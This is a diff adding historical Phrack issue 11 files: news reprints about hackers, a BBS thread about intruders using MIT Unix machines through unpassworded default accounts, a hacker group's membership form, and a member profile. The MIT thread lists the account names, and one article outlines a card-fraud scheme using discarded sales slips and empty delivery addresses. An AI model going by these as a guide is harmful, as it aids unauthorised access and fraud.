"Since writing the above, my plans have changed slightly.... But the point is,
|
||||
that I am going to take the money I have left in the bank (my liquid assets)
|
||||
and make a final attempt at making life worthy. It will be a short attempt,
|
||||
and I do suspect that if it works out that none of my current friends will
|
||||
know me then. If it doesn't work out, the news of my death will probably get
|
||||
around. (I won't try to hide it.)"
|
||||
|
||||
Landreth's birthday is December 26 and his best friend is not counting on
|
||||
seeing him again.
|
||||
|
||||
"We used to joke about what you could learn about life, especially since if
|
||||
you don't believe in a God, then there's not much point to life," said Tom
|
||||
Anderson, 16, a senior at San Pasqual High School in Escondido, about 30 miles
|
||||
north of San Diego. Anderson also has been convicted of computer hacking and
|
||||
placed on probation.
|
||||
|
||||
Anderson was the last person to see Landreth. It was around September 25 --
|
||||
he does not remember exactly. Landreth had spent a week living in Anderson's
|
||||
home so the two could share Landreth's computer. Anderson's IBM-PC had been
|
||||
confiscated by authorities, and he wanted to complete his own book.
|
||||
|
||||
Anderson said he and Landreth were also working on a proposal for a movie
|
||||
about their exploits.
|
||||
|
||||
"He started to write the proposal for it on the computer, and I went to take a
|
||||
shower," Anderson said. "When I came out, he was gone. The proposal was in
|
||||
mid-sentence. And I haven't seen him since."
|
||||
|
||||
Apparently Landreth took only his house key, a passport, and the clothes on
|
||||
his back.
|
||||
|
||||
Anderson said he initially was not concerned about Landreth's absence. After
|
||||
all this was the same Landreth who, during the summer, took off for Mexico
|
||||
without telling anyone -- including friends he had seen just the night before
|
||||
-- of his departure.
|
||||
|
||||
But concern grew by October 1, when Landreth failed to keep a speaking
|
||||
engagement with a group of auditors in Ohio, for which he would have received
|
||||
$1,000 plus expenses. Landreth may have kept a messy room and poor financial
|
||||
records, but he was reliable enough to keep a speaking engagement, said his
|
||||
friends and literary agent, Bill Gladstone, noting that Landreth's second
|
||||
manuscript was due in August and had not yet been delivered.
|
||||
|
||||
But, the manuscript never came and Landreth has not reappeared.
|
||||
|
||||
Steve Burnap, another close friend, said that during the summer Landreth had
|
||||
grown lackadaisical toward life. "He just didn't seem to care much about
|
||||
anything anymore."
|
||||
Typed for PWN by Druidic Death
|
||||
From The Dallas Times Herald
|
||||
______________________________________________________________________________
|
||||
|
||||
Beware The Hacker Tracker December, 1986
|
||||
-------------------------
|
||||
By Lamont Wood of Texas Computer Market Magazines
|
||||
|
||||
If you want to live like a spy in your own country, you don't have to join the
|
||||
CIA or the M15 or the KGB. You can track hackers, like John Maxfield of
|
||||
Detroit.
|
||||
|
||||
Maxfield is a computer security consultant running a business called
|
||||
BoardScan, which tracks hackers for business clients. He gets occasional
|
||||
death threats and taunting calls from his prey, among whom he is known as the
|
||||
"hacker tracker," and answers the phone warily.
|
||||
|
||||
And although he has received no personal harassment, William Tener, head of
|
||||
data security for the information services division of TRW, Inc., has found it
|
||||
necessary to call in experts in artificial intelligence from the aerospace
|
||||
industry in an effort to protect his company's computer files. TRW is a juicy
|
||||
target for hackers because the firm stores personal credit information on
|
||||
about 130 million Americans and 11 million businesses -- data many people
|
||||
would love to get hold of.
|
||||
|
||||
Maxfield estimates that the hacker problem has increased by a factor of 10 in
|
||||
the last four years, and now seems to be doubling every year. "Nearly every
|
||||
system can be penetrated by a 14-year old with $200 worth of equipment," he
|
||||
complains. "I have found kids as young as nine years old involved in hacking.
|
||||
If such young children can do it, think of what an adult can do."
|
||||
|
||||
Tener estimates that there are as many as 5,000 private computer bulletin
|
||||
boards in the country, and that as many as 2,000 are hacker boards. The rest
|
||||
are as for uses as varied as club news, customer relations, or just as a hobby.
|
||||
Of the 2,000 about two dozen are used by "elite" hackers, and some have
|
||||
security features as good as anything used by the pentagon, says Maxfield.
|
||||
|
||||
The number of hackers themselves defies estimation, if only because the users
|
||||
of the boards overlap. They also pass along information from board to board.
|
||||
Maxfield says he has seen access codes posted on an east coast bulletin board
|
||||
that appeared on a west coast board less than an hour later, having passed
|
||||
through about ten boards in the meantime. And within hours of the posting of
|
||||
a new number anywhere, hundreds of hackers will try it.
|
||||
|
||||
"Nowadays, every twerp with a Commodore 64 and a modem can do it, all for the
|
||||
ego trip of being the nexus for forbidden knowledge," sighs a man in New York
|
||||
City, known either as "Richard Cheshire" or "Chesire Catalyst" -- neither is
|
||||
his real name. Cheshire was one of the earliest computer hackers, from the
|
||||
days when the Telex network was the main target, and was the editor of TAP, a
|
||||
newsletter for hackers and phone "phreaks". Oddly enough, TAP itself was an
|
||||
early victim of the hacker upsurge. "The hacker kids had their bulletin
|
||||
boards and didn't need TAP -- we were technologically obsolete," he recalls.
|
||||
|
||||
So who are these hackers and what are they doing? Tener says most of the ones
|
||||
he has encountered have been 14 to 18 year old boys, with good computer
|
||||
systems, often bright, middle class, and good students. They often have a
|
||||
reputation for being loners, if only because they spend hours by themselves at
|
||||
a terminal, but he's found out-going hacker athletes.
|
||||
|
||||
But Maxfield is disturbed by the sight of more adults and criminals getting
|
||||
involved. Most of what the hackers do involves "theft of services" -- free
|
||||
access to Compuserve, The Source, or other on-line services or corporate
|
||||
systems. But, increasingly, the hackers are getting more and more into credit
|
||||
card fraud.
|
||||
|
||||
Maxfield and Cheshire describe the same process -- the hackers go through
|
||||
trash bins outside businesses whose computer they want to break into looking
|
||||
for manuals or anything that might have access codes on it. They may find it,
|
||||
but they also often find carbon copies of credit card sales slips, from which
|
||||
they can read credit card numbers. They use these numbers to order
|
||||
merchandise -- usually computer hardware -- over the phone and have it
|
||||
delivered to an empty house in their neighborhood, or to a house where nobody
|
||||
is home during the day. Then all they have to do is be there when the delivery
|
||||
truck arrives.
|
||||
|
||||
"We've only been seeing this in the last year," Maxfield complains. "But now
|
||||
we find adults running gangs of kids who steal card numbers for them. The
|
||||
adults resell the merchandise and give the kids a percentage of the money."
|
||||
|
||||
It's best to steal the card number of someone rich and famous, but since
|
||||
that's usually not possible it's a good idea to be able to check the victim's
|
||||
credit, because the merchant will check before approving a large credit card
|
||||
sale. And that's what makes TRW such a big target -- TRW has the credit
|
||||
files. And the files often contain the number of any other credit cards the
|
||||
victim owns, Maxfield notes.
|
||||
|
||||
The parents of the hackers, meanwhile, usually have no idea what their boy is
|
||||
up to -- he's in his room playing, so what could be wrong? Tener recalls a
|
||||
case where the parents complained to the boy about the high phone bill one
|
||||
month. And the next month the bill was back to normal. And so the parents
|
||||
were happy. But the boy had been billing the calls to a stolen telephone
|
||||
company credit card.
|
||||
|
||||
"When it happens the boy is caught and taken to jail, you usually see that the
|
||||
parents are disgruntled at the authorities -- they still think that Johnny was
|
||||
just playing in his bedroom. Until, of course, they see the cost of Johnny's
|
||||
play time, which can run $50,000 to $100,000. But outside the cost, I have
|
||||
never yet seen a parent who was really concerned that somebody's privacy has
|
||||
been invaded -- they just think Johnny's really smart," Tener says.
|
||||
|
||||
TRW will usually move against hackers when they see a TRW file or access
|
||||
information on a bulletin board. Tener says they usually demand payment for
|
||||
their investigation costs, which average about $15,000.
|
||||
|
||||
Tales of the damage hackers have caused often get exaggerated. Tener tells of
|
||||
highly publicized cases of hackers who, when caught, bragged about breaking
|
||||
into TRW, when no break-ins had occurred. But Maxfield tells of two 14-year
|
||||
old hackers who were both breaking into and using the same corporate system.
|
||||
They had an argument and set out to erase each other's files, and in the
|
||||
process erased other files that cost about a million dollars to replace.
|
||||
Being juveniles, they got off free.
|
||||
|
||||
After being caught, Tener says most hackers find some other hobby. Some,
|
||||
after turning 18, are hired by the firms they previously raided. Tener says
|
||||
it rare to see repeat offenders, but Maxfield tells of one 14-year-old repeat
|
||||
offender who was first caught at age 13.
|
||||
|
||||
Maxfield and Tener both make efforts to follow the bulletin boards, and
|
||||
Maxfield even has a network of double agents and spies within the hacker
|
||||
community. Tener uses artificial intelligence software to examine the day's
|
||||
traffic to look for suspicious patterns. TRW gets about 40,000 inquiries an
|
||||
hour and has about 25,000 subscribers. But that does not address the
|
||||
underlying problem.
|
||||
|
||||
"The real problem is that these systems are not well protected, and some can't
|
||||
be protected at all," Maxfield says.
|
||||
|
||||
Cheshire agrees. "A lot of companies have no idea what these kids can do to
|
||||
them," he says. "If they would make access even a little difficult the kids
|
||||
will go on to some other system." As for what else can be done, he notes that
|
||||
at MIT the first thing computer students are taught is how to crash the
|
||||
system. Consequently, nobody bothers to do it.
|
||||
|
||||
But the thing that annoys old-timer Cheshire (and Maxfield as well) is that
|
||||
the whole hacker-intruder-vandal-thief phenomenon goes against the ideology of
|
||||
the original hackers, who wanted to explore systems, not vandalize them.
|
||||
Cheshire defines the original "hacker ethic" as the belief that information is
|
||||
a value-free resource that should be shared. In practice, it means users
|
||||
should add items to files, not destroy them, or add features to programs,
|
||||
rather than pirate them.
|
||||
|
||||
"These kids want to make a name for themselves, and they think that they need
|
||||
to do something dirty to do that. But they do it just as well by doing
|
||||
something clever, such as leaving a software bug report on a system," he
|
||||
notes.
|
||||
|
||||
Meanwhile, Maxfield says we are probably stuck with the problem at least until
|
||||
the phone systems converts to digital technology, which should strip hackers
|
||||
of anonymity by making their calls easy to trace.
|
||||
|
||||
Until someone figures out how to hack digital phone networks, of course. -TCM
|
||||
|
||||
Typed for PWN by Druidic Death
|
||||
______________________________________________________________________________
|
463
phrack11/12.txt
Normal file
463
phrack11/12.txt
Normal file
|
@ -0,0 +1,463 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Eleven, Phile #12 of 12
|
||||
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
PWN PWN
|
||||
PWN *>=-{ Phrack World News }-=<* PWN
|
||||
PWN PWN
|
||||
PWN Issue XI PWN
|
||||
PWN PWN
|
||||
PWN Written, Compiled, and Edited PWN
|
||||
PWN by Knight Lightning PWN
|
||||
PWN PWN
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
|
||||
Computer Bulletin Boards January 8, 1986
|
||||
------------------------
|
||||
By The KTVI Channel 2 News Staff in St. Louis
|
||||
|
||||
Please keep in mind that Karen and Russ are anchor persons at KTVI.
|
||||
All comments in []s are by me.-KL
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
Karen: If Santa Claus brought you a computer for Christmas, beware of seeing
|
||||
a few things you may not have bargained for. Computer bulletin boards
|
||||
have spread by the thousands over the past few years and now some
|
||||
people are concerned that the electronic messages may have gotten a
|
||||
bit out of hand.
|
||||
|
||||
Russ: In its simplest definition, a computer bulletin board is a program or
|
||||
message that can be accessed by other computers via telephone lines.
|
||||
Anyone who has a home computer and a modem can receive and transmit to
|
||||
computer bulletin boards. There are thousands of them nationwide, but
|
||||
some are causing quite a stink [What a profound statement Russ].
|
||||
|
||||
[Flash to a picture of a geeky looking teenager]
|
||||
|
||||
Meet Jason Rebbe, he is a 16 year old computer whiz who a few months
|
||||
ago accidentally tapped into a bulletin board called Dr. Doom's Castle.
|
||||
[Sorry to break in here Russ, but why is this guy a computer whiz?
|
||||
Just because he has a computer? Hey Russ, look a little closer, isn't
|
||||
Jason sitting in front of a Commodore-64? I thought so. Oh yeah one
|
||||
other thing, this BBS Dr. Doom's Castle has no known relation to Dr.
|
||||
Doom (512) or Danger Zone Private.] Dr. Doom gives instructions on how
|
||||
to build bombs and guns [Lions and Tigers and Bears, oh my!]. Jason
|
||||
found the recipe for smoke bombs and tried to make one in his kitchen,
|
||||
it didn't work. [Ba ha ha].
|
||||
|
||||
Jason: I heard an explosion in the basement first and that's when I knew
|
||||
something was wrong. I thought it would be really neat to just set it
|
||||
off someday when there was a lot of people around, just as a joke or a
|
||||
prank. [Yeah, that would be K-Rad d00d!]. I didn't expect it to blow
|
||||
up my house.
|
||||
|
||||
Russ: Jason wasn't hurt, but it cost about 2 grand [that's $2,000 to you and
|
||||
me] to repair the kitchen. Jason's dad didn't take it well.
|
||||
|
||||
Bob Holloway: Mad wasn't the word for it. I, I was, I was past mad.
|
||||
|
||||
Russ: Mr. Holloway called Southwestern Bell and AT&T to see what could be
|
||||
done about bulletin boards like Dr. Doom's Castle. The answer was
|
||||
nothing. The Bureau of Alcohol, Tobacco, and Firearms said the same
|
||||
thing.
|
||||
|
||||
Daniel Hoggart (Bureau of Alcohol, Tobacco, and Firearms): There is no
|
||||
violation in publishing the information. The violation only
|
||||
occurs when someone actually follows through on the
|
||||
instructions and actually constructs a bomb.
|
||||
|
||||
Russ: Another bulletin board that is becoming more and more prevalent these
|
||||
days is the Aryian Nation. This one [bulletin board] in Chicago says,
|
||||
"If you are an anti-Communist you have made the right connection...on
|
||||
the other hand, if you are consumed with such myths as
|
||||
Judeo-Christianity, you most definitely dialed the wrong number."
|
||||
|
||||
Stan Anderman (Anti-Defamation League): Some of this really extreme hatred
|
||||
is an attempt to create an environment where violence becomes
|
||||
acceptable.
|
||||
|
||||
Russ: Like most computer bulletin boards the Aryian Nation message is legal
|
||||
and falls under free speech laws. However, a bill is scheduled to go
|
||||
to congress this session outlawing the kinds of bulletin boards we saw
|
||||
here tonight.
|
||||
|
||||
But, for the moment, hackers should not be too surprised if something
|
||||
unusual pops up on their computer terminal. [Ahem, Russ, you did it
|
||||
again. All computer users are *NOT* hackers.]
|
||||
|
||||
Typed For PWN's Usage by Knight Lightning
|
||||
______________________________________________________________________________
|
||||
|
||||
MIT Unix: Victim or Aggressor? January 23 - February 2, 1987
|
||||
-------------------------------
|
||||
Is the MIT system an innocent victim of hacker oppression or simply another
|
||||
trap to capture unsuspecting hackers in the act?
|
||||
|
||||
It all started like this...
|
||||
|
||||
[Some posts have been slightly edited to be relevant to the topic]
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
MIT
|
||||
Name: Druidic Death
|
||||
Date: 12:49 am Mon Jan 20, 1986
|
||||
|
||||
Lately I've been messing around on MIT's VAX in there Physics Department.
|
||||
|
||||
Recently some one else got on there and did some damage to files. However MIT
|
||||
told me that they'll still trust us to call them. The number is:
|
||||
|
||||
617-253-XXXX
|
||||
|
||||
We have to agree to the following or we will be kicked off, they will create a
|
||||
"hacker" account for us.
|
||||
|
||||
<1> Use only GUEST, RODNEY, and GAMES. No other accounts until the
|
||||
hacker one is made. There are no passwords on these accounts.
|
||||
|
||||
<2> Make sure we log off properly. Control-D. This is a UNIX system.
|
||||
|
||||
<3> Not to call between 9 AM and 5 PM Eastern Standard Time. This
|
||||
is to avoid tying up the system.
|
||||
|
||||
<4> Leave mail to GEORGE only with UNIX questions (or C). And leave our
|
||||
handles so he'll know who we are.
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
Unix
|
||||
Name: Celtic Phrost
|
||||
Date: 4:16 pm Mon Jan 20, 1986
|
||||
|
||||
Thanks Death for the MIT computer, I've been working on getting into them for
|
||||
weeks. Here's another you can play around with:
|
||||
|
||||
617/258-XXXX
|
||||
login:GUEST
|
||||
|
||||
Or use a WHO command at the logon to see other accounts, it has been a long
|
||||
time since I played with that system, so I am unsure if the GUEST account
|
||||
still works, but if you use the WHO command you should see the GUEST account
|
||||
needed for applying for your own account.
|
||||
|
||||
-Phrost
|
||||
------------------------------------------------------------------------------
|
||||
Unix
|
||||
Name: Celtic Phrost
|
||||
Date: 5:35 pm Mon Jan 20, 1986
|
||||
|
||||
Ok, sorry, but I just remembered the application account, its: OPEN
|
||||
Gawd, I am glad I got that off my chest!
|
||||
|
||||
-(A relieved)Celtic Phrost.
|
||||
|
||||
Also on that MIT computer Death listed, some other default accounts are:
|
||||
|
||||
LONG MIKE GREG NEIL DAN
|
||||
|
||||
Get the rest yourself, and please people, LEAVE THEM UNPASSWORDED!
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
MIT
|
||||
Name: Druidic Death #12
|
||||
Date: 1:16 am Fri Jan 23, 1987
|
||||
|
||||
MIT is pretty cool. If you haven't called yet, try it out. Just PLEASE make
|
||||
sure you follow the little rules they asked us about! If someone doesn't do
|
||||
something right the sysop leaves the gripe mail to me. Check out my directory
|
||||
under the guest account just type "cd Dru". Read the first file.
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
MIT
|
||||
Name: Ctrl C
|
||||
Date: 12:56 pm Sat Jan 24, 1987
|
||||
|
||||
MIT Un-Passworded Unix Accounts: 617-253-XXXX
|
||||
|
||||
ALEX BILL GAMES DAVE GUEST DAN GREG MIKE LONG NEIL TOM TED
|
||||
BRIAN RODNEY VRET GENTILE ROCKY SPIKE KEVIN KRIS TIM
|
||||
|
||||
And PLEASE don't change the Passwords....
|
||||
|
||||
-=>Ctrl C<=-
|
||||
------------------------------------------------------------------------------
|
||||
MIT Again
|
||||
Name: Druidic Death
|
||||
Date: 1:00 pm Wed Jan 28, 1987
|
||||
|
||||
Ok people, MIT is pissed, someone hasn't been keeping the bargain and they
|
||||
aren't too thrilled about it. There were only three things they asked us to
|
||||
do, and they were reasonable too. All they wanted was for us to not
|
||||
compromise the security much more than we had already, logoff properly, not
|
||||
leave any processes going, and call only during non-business hours, and we
|
||||
would be able to use the GUEST accounts as much as we like.
|
||||
|
||||
Someone got real nice and added themselves to the "daemon" group which is
|
||||
superusers only, the name was "celtic". Gee, I wonder who that could have
|
||||
been? I'm not pissed at anyone, but I'd like to keep on using MIT's
|
||||
computers, and they'd love for us to be on, but they're getting paranoid.
|
||||
Whoever is calling besides me, be cool ok? They even gave me a voice phone to
|
||||
chat with their sysops with. How often do you see this happen?
|
||||
|
||||
a little perturbed but not pissed...
|
||||
|
||||
DRU'
|
||||
------------------------------------------------------------------------------
|
||||
Tsk, Celtic.
|
||||
Name: Evil Jay
|
||||
Date: 9:39 am Thu Jan 29, 1987
|
||||
|
||||
Well, personally I don't know why anyone would want to be a superuser on the
|
||||
system in question. Once you've been on once, there is really nothing that
|
||||
interesting to look at...but anyway.
|
||||
|
||||
-EJ
|
||||
------------------------------------------------------------------------------
|
||||
In trouble again...
|
||||
Name: Celtic Phrost
|
||||
Date: 2:35 pm Fri Jan 30, 1987
|
||||
|
||||
...I was framed!! I did not add myself to any "daemon" group on any MIT UNIX.
|
||||
I did call once, and I must admit I did hang up without logging off, but this
|
||||
was due to a faulty program that would NOT allow me to break out of it, no
|
||||
matter what I tried. I am sure that I didn't cause any damage by that.
|
||||
|
||||
-Phrost
|
||||
------------------------------------------------------------------------------
|
||||
Major Problems
|
||||
Name: Druidic Death
|
||||
Date: 12:20 pm Sat Jan 31, 1987
|
||||
|
||||
OK, major stuff going down. Some unidentified individual logged into the
|
||||
Physics Dept's PDP11/34 at 617-253-XXXX and was drastically violating the
|
||||
"agreement" we had reached. I was the one that made the "deal" with them.
|
||||
And they even gave me a voice line to talk to them with.
|
||||
|
||||
Well, one day I called the other Physics computer, the office AT and
|
||||
discovered that someone created an account in the superuser DAEMON group
|
||||
called "celtic". Well, I was contacted by Brian through a chat and he told me
|
||||
to call him. Then he proceeded to nicely inform me that "due to unauthorized
|
||||
abuse of the system, the deal is off".
|
||||
|
||||
He was cool about it and said he wished he didn't have to do that. Then I
|
||||
called George, the guy that made the deal and he said that someone who said he
|
||||
was "Celtic Phrost" went on to the system and deleted nearly a year's worth of
|
||||
artificial intelligence data from the nuclear fission research base.
|
||||
|
||||
Needless to say I was shocked. I said that he can't believe that it was one
|
||||
of us, that as far as I knew everyone was keeping the deal. Then he (quite
|
||||
pissed off) said that he wanted all of our names so he can report us to the
|
||||
FBI. He called us fags, and all sorts of stuff, he was VERY!! [underline
|
||||
twice] PISSED! I don't blame him. Actually I'm not blaming Celtic Phrost, it
|
||||
very easily could have been a frame up.
|
||||
|
||||
But another thing is George thinks that Celtic Phrost and Druidic Death are
|
||||
one and the same, in other words, he thinks that *I* stabbed him in the back.
|
||||
Basically he just doesn't understand the way the hacker community operates.
|
||||
|
||||
Well, the deal is off, they plan to prosecute whoever they can catch. Since
|
||||
George is my best friend's brother I have not only lost a friend, but I'm
|
||||
likely to see some legal problems soon. Also, I can forget about doing my
|
||||
graduate work at MIT. Whoever did this damage to them, I hope you're happy.
|
||||
You really messed things up real nice for a lot of people.
|
||||
|
||||
Celtic, I don't have any reason to believe you messed with them. I also have
|
||||
no reason to think you didn't. I'm not making an accusation against you, but
|
||||
WHOEVER did this, deserves to be shot as far as I'm concerned. Until this
|
||||
data was lost, they were on the verge of harnessing a laser-lithium produced
|
||||
form of nuclear fission that would have been more efficient than using the
|
||||
standard hydrogen. Well, back to the drawing board now.
|
||||
|
||||
I realize that it's hard to believe that they would have data like this on
|
||||
this system. But they were quite stupid in many other areas too. Leaving the
|
||||
superuser account with no password?? Think about it.
|
||||
|
||||
It's also possible that they were exaggerating. But regardless, damage seems
|
||||
to have been done.
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
MIT
|
||||
Name: Phreakenstein
|
||||
Date: 1:31 am Sun Feb 01, 1987
|
||||
|
||||
Heck! I dunno, but whoever it was, I think, should let himself (the s00per
|
||||
K-rad elyte d00d he is) be known.
|
||||
|
||||
I wasn't on MIT, but it was pretty dumb of MIT to even let Hackers on. I
|
||||
wouldn't really worry though, they did let you on, and all you have to prove
|
||||
is that you had no reason to do it.
|
||||
|
||||
----Phreak
|
||||
------------------------------------------------------------------------------
|
||||
I wonder...
|
||||
Name: Ax Murderer #15
|
||||
Date: 6:43 pm Sun Feb 01, 1987
|
||||
|
||||
I highly doubt that is was someone on this system. Since this is an elite
|
||||
board, I think all the users are pretty decent and know right and wrong things
|
||||
to do. Could be that one of the users on this system called another system
|
||||
and gave it out!?? Nahh...shooting the asshole is not enough, let's think of
|
||||
something better.
|
||||
|
||||
Ax Murderer
|
||||
------------------------------------------------------------------------------
|
||||
It was stupid
|
||||
Name: Druidic Death #12
|
||||
Date: 9:21 pm Sun Feb 01, 1987
|
||||
|
||||
It seems to me, or, what I gathered, they felt that there were going to be
|
||||
hackers on the system to begin with and that this way they could keep
|
||||
themselves basically safe.
|
||||
|
||||
I doubt that it was Celtic Phrost, I don't think he'd be an asshole like that.
|
||||
But I can't say. When I posted, I was pretty pissed about the whole deal.
|
||||
I've calmed down now. Psychic Warlord said something to me voice the other
|
||||
day that made me stop and think. What if this was a set up right from the
|
||||
start? I mean, MIT won't give me specifics on just what supposedly happened,
|
||||
Celtic Phrost denies everything, and the biggest part of it is what George
|
||||
said to me.
|
||||
|
||||
"We can forgive you for what you did to us if you'll promise to go straight
|
||||
and never do this again and just tell us who all of your friends are that are
|
||||
on the system".
|
||||
|
||||
I didn't pay much attention to that remark at first, now I'm beginning to
|
||||
wonder...
|
||||
|
||||
I, of course, didn't narc on anyone. (Who do I know??? hehe)
|
||||
|
||||
DRU'
|
||||
------------------------------------------------------------------------------
|
||||
Well
|
||||
Name: Solid State
|
||||
Date: 11:40 pm Sun Feb 01, 1987
|
||||
|
||||
Well if they were serious about the FBI, I wouldn't take this too lightly.
|
||||
Lately at Stanford there has been a lot of investigators that I've pinpointed
|
||||
running around. This is mainly due to the number of break-ins this summer.
|
||||
|
||||
Anyways, if a large college like MIT says they may call in the FBI, be wary,
|
||||
but don't over-react.
|
||||
|
||||
SOLID STATE
|
||||
------------------------------------------------------------------------------
|
||||
Comments...
|
||||
Name: Delta-Master
|
||||
Date: 7:15 am Mon Feb 02, 1987
|
||||
|
||||
It wouldn't surprise me if it was some kind of setup, it's been done before.
|
||||
|
||||
Delta-Master
|
||||
------------------------------------------------------------------------------
|
||||
Oh well...
|
||||
Name: Evil Jay
|
||||
Date: 8:56 am Mon Feb 02, 1987
|
||||
|
||||
I think your all wrong. The MIT lines have been around for a long time and
|
||||
are widely known among the rodents. Anyone with a g-file could hack out a
|
||||
password on the system so it looks to me like someone just messed around and
|
||||
just happened to use Phrost as a flunkie. Oh well...
|
||||
|
||||
-EJ
|
||||
------------------------------------------------------------------------------
|
||||
All posts taken from:
|
||||
___
|
||||
/ )
|
||||
\___ | | __
|
||||
\ |_ _ _| _ (_ _ _ _
|
||||
(___/ | ) ( \ ( | (_) \/\/ __) | ) ( \ \/\/ | )
|
||||
|
|
||||
\_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_/
|
||||
|
||||
"We're not ELITE... we're just cool as hell."
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
Information Provided indirectly/directly by
|
||||
|
||||
Ax Murderer/Celtic Phrost/Ctrl C/Delta-Master/Druidic Death
|
||||
Evil Jay/Phreakenstein/Solid State
|
||||
______________________________________________________________________________
|
||||
|
||||
Phortune 500: Phreakdom's Newest Organization February 16, 1987
|
||||
----------------------------------------------
|
||||
For those of you who are in the least bit interested, Phortune 500 is a group
|
||||
of telecommunication hobbyists who's goal is to spread information as well as
|
||||
further their own knowledge in the world of telecommunications. This new
|
||||
group was formed by:
|
||||
|
||||
Brew Associates/Handsomest One/Lord Lawless/The Renegade Chemist
|
||||
Quinton J. Miranda/Striker/The Mad Hacker/The Spiker
|
||||
|
||||
These eight members are also known as Board Of Directors (BOD). They don't
|
||||
claim to be *Elite* in the sense that they are they world's greatest hackers,
|
||||
but they ARE somewhat picky about their members. They prefer someone who
|
||||
knows a bit about everything and has talents exclusive to him/herself.
|
||||
|
||||
One of the projects that Phortune 500 has completed is an individual password
|
||||
AE type system. It's called TransPhor. It was written and created by Brew
|
||||
Associates. It has been Beta tested on The Undergraduate Lounge (Sysoped by
|
||||
Quinton J. Miranda). It is due to be released to the public throughout the
|
||||
next few months.
|
||||
|
||||
Phortune 500 has been in operation for about 4 months, and has released two
|
||||
newsletters of their own. The Phortune 500 Newsletter is quite like the
|
||||
"People" of contemporary magazines. While some magazines cover the deep
|
||||
technical aspects of the world in which we communicate, their newsletter tries
|
||||
to cover the lighter side while throwing in information that they feel is "of
|
||||
technical nature." The third issue is due to be released by the end of this
|
||||
month.
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
*>=-> The Phortune 500 Membership Questionnaire <-=<*
|
||||
|
||||
Note: The following information is of a totally confidential nature. The
|
||||
reason you may find this so lengthy and in depth is for our knowledge
|
||||
of you. We, with Phortune 500, feel as though we should know
|
||||
prospective members well before we allow them into our organization.
|
||||
Pending the answers you supply us, you will be admitted to Phortune 500
|
||||
as a charter member. Please answer the following completely...
|
||||
..............................................................................
|
||||
|
||||
Handle :
|
||||
First Name :
|
||||
Voice Phone Number :
|
||||
Data Phone Number :
|
||||
City & State :
|
||||
Age :
|
||||
Occupation (If Applicable) :
|
||||
Place of Employment (Optional) :
|
||||
Work Phone Number (Optional) :
|
||||
Computer Type :
|
||||
Modem Type :
|
||||
Interests :
|
||||
Areas Of Expertise :
|
||||
References (No More Than Three) :
|
||||
Major Accomplishments (If Any) :
|
||||
..............................................................................
|
||||
Answer In 50 Words Or Less;
|
||||
|
||||
^*^ What Is Phortune 500 in Your Opinion?
|
||||
|
||||
^*^ Why Do You Want To Be Involved With Phortune 500?
|
||||
|
||||
^*^ How Can You Contribute to Phortune 500?
|
||||
..............................................................................
|
||||
|
||||
Please answer each question to the best of your ability and then return to any
|
||||
Phortune 500 Board of Directors Member Or a Phortune 500 BBS:
|
||||
|
||||
The Private Connection (Limited Membership) 219-322-7266
|
||||
The Undergraduate AE (Private Files Only) 602-990-1573
|
||||
|
||||
Information provided by
|
||||
|
||||
Quinton J. Miranda & Phortune 500 Board Of Directors
|
||||
______________________________________________________________________________
|
||||
|
||||
PWN Quicknote
|
||||
-------------
|
||||
At the University of Rhode Island there is supposed to be some undercover
|
||||
agent for Bay Bell. Supposedly he hangs out at the library and watches for
|
||||
people checking out the Bell Technical Journals. Then he asks questions like,
|
||||
'What do you want those for?' 'Do you know what 2600Hz is?' and other similar
|
||||
questions. He isn't registered at the school and of course has no classes.
|
||||
[Sounds bogus to me...oh well-KL]. Information by Asmodeus Rex (1/21/87)
|
||||
______________________________________________________________________________
|
||||
|
135
phrack11/2.txt
Normal file
135
phrack11/2.txt
Normal file
|
@ -0,0 +1,135 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Eleven, Phile #2 of 12
|
||||
|
||||
==Phrack Pro-Phile VIII==
|
||||
|
||||
Written and Created by Taran King
|
||||
|
||||
2/17/87
|
||||
|
||||
Welcome to Phrack Pro-Phile VIII. Phrack Pro-Phile is created to
|
||||
bring info to you, the users, about old or highly important/controversial
|
||||
people. This month, I bring to you one of the older and high profile phreaks
|
||||
of the past...
|
||||
|
||||
Wizard of Arpanet
|
||||
~~~~~~~~~~~~~~~~~
|
||||
|
||||
Wizard of Arpanet is one of the older of the phreak/hack generation.
|
||||
His main accomplishments include running Inner Circle and Secret Service BBS.
|
||||
|
||||
Handle: Wizard of Arpanet
|
||||
Call him: Eric
|
||||
Past handles: The Hacker and The Priest
|
||||
Handle Origin: A real programmer on Arpanet was called The
|
||||
Wizard and Eric took his handle from him.
|
||||
Date of Birth: 02/26/69
|
||||
Age in 9 days of this writing: 18 years old
|
||||
Height: 6'1"
|
||||
Weight: 150 lbs
|
||||
Eye color: Blue
|
||||
Hair color: Dishwaterish blond
|
||||
Computers: Atari 400, Commodore 64
|
||||
Sysop/Co-sysop of: Secret Service
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
Wizard of Arpanet started as your average BBS caller. He eventually
|
||||
called Central Processing Unit (a local board to him), and there were these
|
||||
funny numbers on the board. He called and tried to connect with his modem,
|
||||
but they turned out to be Sprint dial-ups. The CPU Sysop informed him of what
|
||||
to do and he started calling national BBSs. Boards that helped him to advance
|
||||
include the Twilight Zone (the sysop was the guy that wrote T-Net), OSUNY,
|
||||
Dragon's Lair, and Delta BBS. Wizard organized various groups which included
|
||||
(from earliest to most recent): PHA (Phreakers and Hackers of America) -
|
||||
(included Deep Throat, Phreak King, and Psycho Killer), The Inner Circle (1st
|
||||
